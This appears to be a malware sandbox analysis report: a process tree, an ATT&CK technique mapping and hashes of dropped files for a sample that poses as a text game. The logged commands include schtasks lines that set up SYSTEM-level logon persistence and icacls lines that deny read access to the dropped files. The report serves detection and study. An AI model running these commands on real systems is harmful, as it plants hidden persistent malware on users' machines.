- Suspicious behavior: EnumeratesProcesses
PID:1136

C:\Windows\system32\schtasks.exe
SCHTASKS /CREATE /F /SC ONLOGON /TR "C:\Windows\System32\Windowsexe\Windows.exe" /TN "Windows.exe" /RL HIGHEST /RU SYSTEM
4⤵
- Creates scheduled task(s)
PID:2452

C:\Windows\system32\schtasks.exe
SCHTASKS /CREATE /F /SC ONLOGON /TR "C:\Windows\System32\Windowsexe\Windows2.exe" /TN "Windows2.exe" /RL LIMITED
4⤵
- Creates scheduled task(s)
PID:880

C:\Windows\system32\schtasks.exe
SCHTASKS /CREATE /F /SC ONLOGON /TR "C:\Windows\System32\Windowsexe\AV.bat" /TN "AV.bat" /RL HIGHEST /RU SYSTEM
4⤵
- Creates scheduled task(s)
PID:2644

C:\Windows\system32\schtasks.exe
SCHTASKS /CREATE /F /SC ONLOGON /TR "C:\Windows\System32\Windowsexe\Update.bat" /TN "Update.bat" /RL HIGHEST /RU SYSTEM
4⤵
- Creates scheduled task(s)
PID:4020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unregister-ScheduledTask -TaskName 'installTEMP' -Confirm:$false"
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2396

C:\Windows\system32\timeout.exe
timeout /t 5 /nobreak
4⤵
- Delays execution with timeout.exe
PID:4036

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\Windowsexe\Windows.exe" /t /grant everyone:R "Admin":R System:F Administrators:F
4⤵
- Modifies file permissions
PID:4900

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\Windowsexe\Windows2.exe" /t /grant everyone:R "Admin":R System:F Administrators:F
4⤵
- Modifies file permissions
PID:3548

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\Windowsexe\Windows3.exe" /t /grant everyone:R "Admin":R System:F Administrators:F
4⤵
- Modifies file permissions
PID:2264

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\Windowsexe\Update.bat" /t /grant everyone:R "Admin":R System:F Administrators:F
4⤵
- Modifies file permissions
PID:3584

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\Windowsexe\AV.bat" /t /grant everyone:R "Admin":R System:F Administrators:F
4⤵
- Modifies file permissions
PID:3624

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\Windows Manager\winmanager.exe" /t /grant everyone:R "Admin":R System:F Administrators:F
4⤵
- Modifies file permissions
PID:4444

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\Windowsexe\Update.bat" /grant everyone:(OI)(CI)R "Admin":(OI)(CI)R
4⤵
- Modifies file permissions
PID:2444

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\Windowsexe\AV.bat" /grant everyone:(OI)(CI)R "Admin":(OI)(CI)R
4⤵
- Modifies file permissions
PID:628

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\Windowsexe\Windows.exe" /grant everyone:(OI)(CI)R "Admin":(OI)(CI)R
4⤵
- Modifies file permissions
PID:1828

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\Windowsexe\Windows2.exe" /grant everyone:(OI)(CI)R "Admin":(OI)(CI)R
4⤵
- Modifies file permissions
PID:4104

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\Windowsexe\Windows3.exe" /grant everyone:(OI)(CI)R "Admin":(OI)(CI)R
4⤵
- Modifies file permissions
PID:3120

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\Windows Manager\winmanager.exe" /grant everyone:(OI)(CI)R "Admin":(OI)(CI)R
4⤵
- Modifies file permissions
PID:1068

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\Windowsexe\AV.bat" /deny everyone:R "Admin":R
4⤵
- Modifies file permissions
PID:1768

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\Windowsexe\Update.bat" /deny everyone:R "Admin":R
4⤵
- Modifies file permissions
PID:1612

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\Windowsexe\Windows.exe" /deny everyone:R "Admin":R
4⤵
- Modifies file permissions
PID:4932

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\Windowsexe\Windows2.exe" /deny everyone:R "Admin":R
4⤵
- Modifies file permissions
PID:3948

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\Windowsexe\Windows3.exe" /deny everyone:R "Admin":R
4⤵
- Modifies file permissions
PID:1092

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\Windows Manager\winmanager.exe" /deny everyone:R "Admin":R
4⤵
- Modifies file permissions
PID:828

C:\Windows\system32\cmd.exe
cmd /c del "C:\Users\Admin\Install.bat"
4⤵
PID:460

C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
3⤵
PID:1820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo light"
3⤵
PID:2352

C:\Windows\system32\find.exe
find /i "light"
3⤵
PID:1540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo light"
3⤵
PID:4716

C:\Windows\system32\find.exe
find /i "start"
3⤵
PID:3620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo start"
3⤵
PID:4968

C:\Windows\system32\find.exe
find /i "start"
3⤵
PID:3284

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo options"
3⤵
PID:4448

C:\Windows\system32\find.exe
find /i "Climb Tree"
3⤵
PID:4884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo options"
3⤵
PID:2472

C:\Windows\system32\find.exe
find /i "OPTIONS"
3⤵
PID:5028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo options"
3⤵
PID:4600

C:\Windows\system32\find.exe
find /i "Explore Path"
3⤵
PID:2896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo options"
3⤵
PID:1300

C:\Windows\system32\find.exe
find /i "Unlock Tree"
3⤵
PID:2328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo explore path"
3⤵
PID:4736

C:\Windows\system32\find.exe
find /i "Climb Tree"
3⤵
PID:4044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo explore path"
3⤵
PID:2596

C:\Windows\system32\find.exe
find /i "OPTIONS"
3⤵
PID:2008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo explore path"
3⤵
PID:2768

C:\Windows\system32\find.exe
find /i "Explore Path"
3⤵
PID:912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo options"
3⤵
PID:3764

C:\Windows\system32\find.exe
find /i "Talk to Waving Villager"
3⤵
PID:1956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo options"
3⤵
PID:2028

C:\Windows\system32\find.exe
find /i "Options"
3⤵
PID:3768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo options"
3⤵
PID:4016

C:\Windows\system32\find.exe
find /i "Back"
3⤵
PID:4784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo talk"
3⤵
PID:756

C:\Windows\system32\find.exe
find /i "Talk to Waving Villager"
3⤵
PID:3184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo talk"
3⤵
PID:2448

C:\Windows\system32\find.exe
find /i "Options"
3⤵
PID:3496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo talk"
3⤵
PID:3592

C:\Windows\system32\find.exe
find /i "Back"
3⤵
PID:3416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo talk to waving villager"
3⤵
PID:1684

C:\Windows\system32\find.exe
find /i "Talk to Waving Villager"
3⤵
PID:4004

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:1488

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:3960

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:3092

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:4032

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:4640

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:3484

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:2796

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:1432

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:3824

C:\Windows\system32\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:4152

C:\Windows\system32\timeout.exe
timeout 5
3⤵
- Delays execution with timeout.exe
PID:2832

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AV.bat
Filesize
4KB

MD5
e905c9305bf6f937c93437ad8dce07b4

SHA1
d7d0bfc44e11dc39b083a51e478e827b4be1c16e

SHA256
6e355fb26e94e43379ff3392d4d20e6e0fa1eaa7b1e2591e9b913adb8d90d327

SHA512
c1750058b0e3c82164ff77ed774c2ab940e15f6d2e7c50b671ff5a568332b231a3635ded25205262c3f2a6151b97075d87ab72e2e1bb5b96bc8849bddc8092f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
3ffce848af907464c20a20e1b430f78a

SHA1
fbcd91a5c226d474235be920cf49e3344893fc1f

SHA256
25213a6685a6fd21a2aa43c417891703333579ad784f3896976b44bcfcdb009e

SHA512
1adaf6d68441a32b459b6071dcfdae404ab1e37bb0c6511e08d49717f9043679bdd7ca3324be184ece522e6516eedc04203ffccb5f9ea790bd35a84db9b944bf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
0826aee0d4c1f55a3c611b4bc01612f4

SHA1
d9931050b4599093f924135bbc9e0f2a2486a888

SHA256
fa23abca821527c328dbafcc523900e8763d6e91e326e84827c82b2ad29c299f

SHA512
1b438f725bfa6436fbb537730e08609b5e67fd892b4e09c400052f7ac87ec769bcc55052e7bad8ab8a4714487117403f183af455d1d10c8629da51da5c036ffb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
d799e6db62162b5cc72c2973f6c86de2

SHA1
ec724418a753877aa4f7f5e39cf08b583f260931

SHA256
ae5d5fda3a967dcfc973795523f46d0f8ceecc47de87d2f2ca6e4649af0dee07

SHA512
c3dab209287e4ab4355f9e65a9b8eaad1fd3e18912fcdb05a5be911f389d222ea61e22183d46659769ea4cedbcc8009616295b7bc459e99f46f82fc427fd6547

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
ff86436496c5e02ea582e34c8b83ab3a

SHA1
cd8856e0b757bfb6be956ed60cd8cc838a08ccaf

SHA256
c6726b9f9db645369bd4e0a25efc4fbc159c0f131437738ea6a1b5a17079ea5e

SHA512
41748b5d0f8aa38c08a1ea72724b2ea8dd055e90eeded29e4e91f1833c01e80ef28c572185d89a2dab70cee095246ca3bcf1e84f2e97d11f60146d78db471c67

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TBAG.bat
Filesize
9KB

MD5
39e70fdd1d314a7ec19de2739a0dbfc7

SHA1
99cb234df12be0597f57646995facb556ab6e6f6

SHA256
e91b662f6c2fcb12e58ec758755282a0e751ec0e705f496bd077676e1cca7a3c

SHA512
bde77b18e9a6b548018618fdd7ec6bff423be13aa3438e73b2abe39b513869b5099fb35247155fdec2fba5abaf49f2c3935c998888e6e5b252a2cc00519085de

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\VCRUNTIME140.dll
Filesize
94KB

MD5
a87575e7cf8967e481241f13940ee4f7

SHA1
879098b8a353a39e16c79e6479195d43ce98629e

SHA256
ded5adaa94341e6c62aea03845762591666381dca30eb7c17261dd154121b83e

SHA512
e112f267ae4c9a592d0dd2a19b50187eb13e25f23ded74c2e6ccde458bcdaee99f4e3e0a00baf0e3362167ae7b7fe4f96ecbcd265cc584c1c3a4d1ac316e92f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\VCRUNTIME140.dll
Filesize
94KB

MD5
a87575e7cf8967e481241f13940ee4f7

SHA1
879098b8a353a39e16c79e6479195d43ce98629e

SHA256
ded5adaa94341e6c62aea03845762591666381dca30eb7c17261dd154121b83e

SHA512
e112f267ae4c9a592d0dd2a19b50187eb13e25f23ded74c2e6ccde458bcdaee99f4e3e0a00baf0e3362167ae7b7fe4f96ecbcd265cc584c1c3a4d1ac316e92f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\_bz2.pyd
Filesize
77KB

MD5
a1fbcfbd82de566a6c99d1a7ab2d8a69

SHA1
3e8ba4c925c07f17c7dffab8fbb7b8b8863cad76

SHA256
0897e209676f5835f62e5985d7793c884fd91b0cfdfaff893fc05176f2f82095

SHA512
55679427c041b2311cff4e97672102962f9d831e84f06f05600ecdc3826f6be5046aa541955f57f06e82ee72a4ee36f086da1f664f493fbe4cc0806e925afa04

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\_bz2.pyd
Filesize
77KB

MD5
a1fbcfbd82de566a6c99d1a7ab2d8a69

SHA1
3e8ba4c925c07f17c7dffab8fbb7b8b8863cad76

SHA256
0897e209676f5835f62e5985d7793c884fd91b0cfdfaff893fc05176f2f82095

SHA512
55679427c041b2311cff4e97672102962f9d831e84f06f05600ecdc3826f6be5046aa541955f57f06e82ee72a4ee36f086da1f664f493fbe4cc0806e925afa04

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\_ctypes.pyd
Filesize
116KB

MD5
92276f41ff9c856f4dbfa6508614e96c

SHA1
5bc8c3555e3407a3c78385ff2657de3dec55988e

SHA256
9ab1f8cbb50db3d9a00f74447a2275a89ec52d1139fc0a93010e59c412c2c850

SHA512
9df63ef04ea890dd0d38a26ac64a92392cf0a8d0ad77929727238e9e456450518404c1b6bb40844522fca27761c4e864550aacb96e825c4e4b367a59892a09e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\_ctypes.pyd
Filesize
116KB

MD5
92276f41ff9c856f4dbfa6508614e96c

SHA1
5bc8c3555e3407a3c78385ff2657de3dec55988e

SHA256
9ab1f8cbb50db3d9a00f74447a2275a89ec52d1139fc0a93010e59c412c2c850

SHA512
9df63ef04ea890dd0d38a26ac64a92392cf0a8d0ad77929727238e9e456450518404c1b6bb40844522fca27761c4e864550aacb96e825c4e4b367a59892a09e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\_lzma.pyd
Filesize
150KB

MD5
a6bee109071bbcf24e4d82498d376f82

SHA1
1babacdfaa60e39e21602908047219d111ed8657

SHA256
ce72d59a0e96077c9ea3f1fd7b011287248dc8d80fd3c16916a1d9040a9a941f

SHA512
8cb2dafd19f212e71fa32cb74dad303af68eaa77a63ccf6d3a6ae82e09ac988f71fe82f8f2858a9c616b06dc42023203fa9f7511fac32023be0bc8392272c336

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\_lzma.pyd
Filesize
150KB

MD5
a6bee109071bbcf24e4d82498d376f82

SHA1
1babacdfaa60e39e21602908047219d111ed8657

SHA256
ce72d59a0e96077c9ea3f1fd7b011287248dc8d80fd3c16916a1d9040a9a941f

SHA512
8cb2dafd19f212e71fa32cb74dad303af68eaa77a63ccf6d3a6ae82e09ac988f71fe82f8f2858a9c616b06dc42023203fa9f7511fac32023be0bc8392272c336

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\_queue.pyd
Filesize
26KB

MD5
8dd33fe76645636520c5d976b8a2b6fc

SHA1
12988ddd52cbb0ce0f3b96ce19a1827b237ed5f7

SHA256
8e7e758150ea066299a956f268c3eb04bc800e9f3395402cd407c486844a9595

SHA512
e7b4b5662ebd8efb2e4b6f47eb2021afacd52b100db2df66331ca79a4fb2149cac621d5f18ab8ab9cfadbd677274db798ebad9b1d3e46e29f4c92828fd88c187

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\_queue.pyd
Filesize
26KB

MD5
8dd33fe76645636520c5d976b8a2b6fc

SHA1
12988ddd52cbb0ce0f3b96ce19a1827b237ed5f7

SHA256
8e7e758150ea066299a956f268c3eb04bc800e9f3395402cd407c486844a9595

SHA512
e7b4b5662ebd8efb2e4b6f47eb2021afacd52b100db2df66331ca79a4fb2149cac621d5f18ab8ab9cfadbd677274db798ebad9b1d3e46e29f4c92828fd88c187

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\_socket.pyd
Filesize
73KB

MD5
c5378bac8c03d7ef46305ee8394560f5

SHA1
2aa7bc90c0ec4d21113b8aa6709569d59fadd329

SHA256
130de3506471878031aecc4c9d38355a4719edd3786f27262a724efc287a47b9

SHA512
1ecb88c62a9daad93ec85f137440e782dcc40d7f1598b5809ab41bf86a5c97224e2361c0e738c1387c6376f2f24d284583fd001c4e1324d72d6989d0b84bf856

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\_socket.pyd
Filesize
73KB

MD5
c5378bac8c03d7ef46305ee8394560f5

SHA1
2aa7bc90c0ec4d21113b8aa6709569d59fadd329

SHA256
130de3506471878031aecc4c9d38355a4719edd3786f27262a724efc287a47b9

SHA512
1ecb88c62a9daad93ec85f137440e782dcc40d7f1598b5809ab41bf86a5c97224e2361c0e738c1387c6376f2f24d284583fd001c4e1324d72d6989d0b84bf856

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\_ssl.pyd
Filesize
152KB

MD5
9d810454bc451ff440ec95de36088909

SHA1
8c890b934a2d84c548a09461ca1e783810f075be

SHA256
5a4c78adedf0bcb5fc422faac619b4c7b57e3d7ba4f2d47a98c1fb81a503b6b7

SHA512
0800666f848faec976366dbfd2c65e7b7e1d8375d5d9e7d019bf364a1f480216c271c3bcf994dbab19290d336cf691cd8235e636f3dbc4d2a77f4760871c19ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\_ssl.pyd
Filesize
152KB

MD5
9d810454bc451ff440ec95de36088909

SHA1
8c890b934a2d84c548a09461ca1e783810f075be

SHA256
5a4c78adedf0bcb5fc422faac619b4c7b57e3d7ba4f2d47a98c1fb81a503b6b7

SHA512
0800666f848faec976366dbfd2c65e7b7e1d8375d5d9e7d019bf364a1f480216c271c3bcf994dbab19290d336cf691cd8235e636f3dbc4d2a77f4760871c19ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\base_library.zip
Filesize
812KB

MD5
4c03caa79c462b5df082efde831684fd

SHA1
7ca43faee8c8cfa6027f30f5f732a12a2557e59a

SHA256
ccf72c5a640a54e84c4a5c3dfb242b2998203b57c79bf051d18860a57dc53592

SHA512
d5f6b3ee869cbb9a35ce6949e4a540e7e3c8baa4de10c641be4c923aba680b75d055ec3d7eced3593128e6cc1d969fe3171e1640ea66e0d5031a8b9a47c3b25d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\cv2\cv2.pyd
Filesize
66.7MB

MD5
e98b3a1aa137ca0361018b4c61654ab0

SHA1
fef0c656c77fa1fa907075fa27b7296877931fc4

SHA256
631ec500d0010f21dcbb40023707969b0eb9521a5696eb38415b5b53b0eeb1bf

SHA512
6822bd3a8bade73d1701a16e53e13b5172b4aff3bc81306922e8cdfc31b6169ccc1a763063b49e84e2bd5ffeeeb318373fa9ba5059021e1e43f4f9465eda2df3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\cv2\cv2.pyd
Filesize
66.7MB

MD5
e98b3a1aa137ca0361018b4c61654ab0

SHA1
fef0c656c77fa1fa907075fa27b7296877931fc4

SHA256
631ec500d0010f21dcbb40023707969b0eb9521a5696eb38415b5b53b0eeb1bf

SHA512
6822bd3a8bade73d1701a16e53e13b5172b4aff3bc81306922e8cdfc31b6169ccc1a763063b49e84e2bd5ffeeeb318373fa9ba5059021e1e43f4f9465eda2df3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\libcrypto-1_1.dll
Filesize
3.3MB

MD5
ab01c808bed8164133e5279595437d3d

SHA1
0f512756a8db22576ec2e20cf0cafec7786fb12b

SHA256
9c0a0a11629cced6a064932e95a0158ee936739d75a56338702fed97cb0bad55

SHA512
4043cda02f6950abdc47413cfd8a0ba5c462f16bcd4f339f9f5a690823f4d0916478cab5cae81a3d5b03a8a196e17a716b06afee3f92dec3102e3bbc674774f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\libcrypto-1_1.dll
Filesize
3.3MB

MD5
ab01c808bed8164133e5279595437d3d

SHA1
0f512756a8db22576ec2e20cf0cafec7786fb12b

SHA256
9c0a0a11629cced6a064932e95a0158ee936739d75a56338702fed97cb0bad55

SHA512
4043cda02f6950abdc47413cfd8a0ba5c462f16bcd4f339f9f5a690823f4d0916478cab5cae81a3d5b03a8a196e17a716b06afee3f92dec3102e3bbc674774f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\libffi-7.dll
Filesize
32KB

MD5
eef7981412be8ea459064d3090f4b3aa

SHA1
c60da4830ce27afc234b3c3014c583f7f0a5a925

SHA256
f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081

SHA512
dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\libffi-7.dll
Filesize
32KB

MD5
eef7981412be8ea459064d3090f4b3aa

SHA1
c60da4830ce27afc234b3c3014c583f7f0a5a925

SHA256
f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081

SHA512
dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\libssl-1_1.dll
Filesize
682KB

MD5
de72697933d7673279fb85fd48d1a4dd

SHA1
085fd4c6fb6d89ffcc9b2741947b74f0766fc383

SHA256
ed1c8769f5096afd000fc730a37b11177fcf90890345071ab7fbceac684d571f

SHA512
0fd4678c65da181d7c27b19056d5ab0e5dd0e9714e9606e524cdad9e46ec4d0b35fe22d594282309f718b30e065f6896674d3edce6b3b0c8eb637a3680715c2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\libssl-1_1.dll
Filesize
682KB

MD5
de72697933d7673279fb85fd48d1a4dd

SHA1
085fd4c6fb6d89ffcc9b2741947b74f0766fc383

SHA256
ed1c8769f5096afd000fc730a37b11177fcf90890345071ab7fbceac684d571f

SHA512
0fd4678c65da181d7c27b19056d5ab0e5dd0e9714e9606e524cdad9e46ec4d0b35fe22d594282309f718b30e065f6896674d3edce6b3b0c8eb637a3680715c2c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\numpy\core\_multiarray_umath.cp310-win_amd64.pyd
Filesize
2.9MB

MD5
138d1d75b7bd3068c7c78247edd39086

SHA1
0130659f037e78a59738a18e09771d16ed969622

SHA256
ec5c5a58b3b370e09b0e719d83356a3523b1ad9233648ac433b6911c625c5d75

SHA512
40219d5ca8c0aa7056fc035caffdda834668568ec493e95d3e6509f2c71a361ea89e7210326caf85e42323b6d016e94bf7965138315577706357fcde3c8265d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\pyexpat.pyd
Filesize
189KB

MD5
8b9855e1b442b22984dc07a8c6d9d2ed

SHA1
2e708fbf1344731bca3c603763e409190c019d7f

SHA256
4d0f50757a4d9abe249bd7ebea35243d4897911a72de213ddb6c6945fef49e06

SHA512
59ca1cbc51a0b9857e921e769587b021bc3f157d8680bb8f7d7f99deb90405db92051e9be8891399379d918afc5d8cb36123297d748c5265ae0855613b277809

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\pyexpat.pyd
Filesize
189KB

MD5
8b9855e1b442b22984dc07a8c6d9d2ed

SHA1
2e708fbf1344731bca3c603763e409190c019d7f

SHA256
4d0f50757a4d9abe249bd7ebea35243d4897911a72de213ddb6c6945fef49e06

SHA512
59ca1cbc51a0b9857e921e769587b021bc3f157d8680bb8f7d7f99deb90405db92051e9be8891399379d918afc5d8cb36123297d748c5265ae0855613b277809

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\python3.DLL
Filesize
60KB

MD5
0812ee5d8abc0072957e9415ba6e62f2

SHA1
ea05c427e46c5d9470ba81d6b7cbca6838ee0dd5

SHA256
84a29c369560c5175d22ee764fe8ada882ab6b37b6b10c005404153518a344ec

SHA512
18ca5631f2ae957b9ec8eaa7aa87094d3a296548790ced970752625a0f271511e0ce0042a0ea5469a9c362a0d811c530ef6fe41b84c61b25c838466acc37f22b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI28242\python3.dll
Filesize
60KB

MD5
0812ee5d8abc0072957e9415ba6e62f2

SHA1
ea05c427e46c5d9470ba81d6b7cbca6838ee0dd5

SHA256
84a29c369560c5175d22ee764fe8ada882ab6b37b6b10c005404153518a344ec

SHA512
18ca5631f2ae957b9ec8eaa7aa87094d3a296548790ced970752625a0f271511e0ce0042a0ea5469a9c362a0d811c530ef6fe41b84c61b25c838466acc37f22b

Download Submit
